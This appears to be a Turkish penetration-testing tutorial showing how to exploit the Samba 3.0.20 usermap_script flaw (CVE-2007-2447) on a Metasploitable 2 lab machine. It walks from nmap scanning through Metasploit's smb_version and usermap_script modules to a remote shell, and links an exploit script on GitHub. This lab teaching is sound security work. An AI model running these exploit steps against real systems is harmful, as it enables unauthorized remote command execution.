MSF usermap_script İstismar Modülü ile SAMBA Zafiyetinin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

0
778
views
Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda, Metasploitable 2 üzerindeki SAMBA servisine ait zafiyet tespit edildikten sonra istismar edilecek ve SAMBA servisini çalıştıran kullanıcı hakları ile komut satırı bağlantısı elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

IP adresi 192.168.5.106 olan Metasploitable 2, Nmap ile taratıldığında TCP 445. portta SAMBA 3.x servisinin hizmet verdiği görülmektedir.

nmap -p445 -sV -n –open 192.168.5.106

acquiring-meterpreter-shell-on-linux-by-using-msf-usermap-script-exploit-module-01

 

SAMBA servisinin sürümünü tespit etmek için MSF smb_version auxiliary modülü kullanılabilir.

search smb_version
use auxiliary/scanner/smb/smb_version
show options

acquiring-meterpreter-shell-on-linux-by-using-msf-usermap-script-exploit-module-02

 

Modül çalıştırılır.

set RHOSTS 192.168.5.106
run

acquiring-meterpreter-shell-on-linux-by-using-msf-usermap-script-exploit-module-03

 

Böylece SAMBA servisinin sürümünün 3.0.20 olduğu görülmektedir. Bu sürümdeki zafiyetlerin istismar modülünü tespit edebilmek Rapid7 İstismar Veritabanı kullanılabilir.

https://www.rapid7.com/db/modules

acquiring-meterpreter-shell-on-linux-by-using-msf-usermap-script-exploit-module-04

 

SAMBA 3.0.20 servisinin MSF usermap_script istismar modülü ile istismar edilebileceği görülmektedir.

acquiring-meterpreter-shell-on-linux-by-using-msf-usermap-script-exploit-module-05

 

Modülün temel seçenekleri incelenir.

use exploit/multi/samba/usermap_script
show options

acquiring-meterpreter-shell-on-linux-by-using-msf-usermap-script-exploit-module-06

 

Hedef IP adresi yazılarak modül başlatılır ve komut satırına erişim sağlanır.

set RHOST 192.168.5.106
run
id
hostname

acquiring-meterpreter-shell-on-linux-by-using-msf-usermap-script-exploit-module-07

 

 

Not: Benzer olarak Gİthub üzerindeki usermap_script.py isimli Python betiği de kullanılabilir.

https://github.com/amriunix/CVE-2007-2447

 

Kaynaklar:

https://pentestworld.blogspot.com/2019/05/hack-box-lame.html

 

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.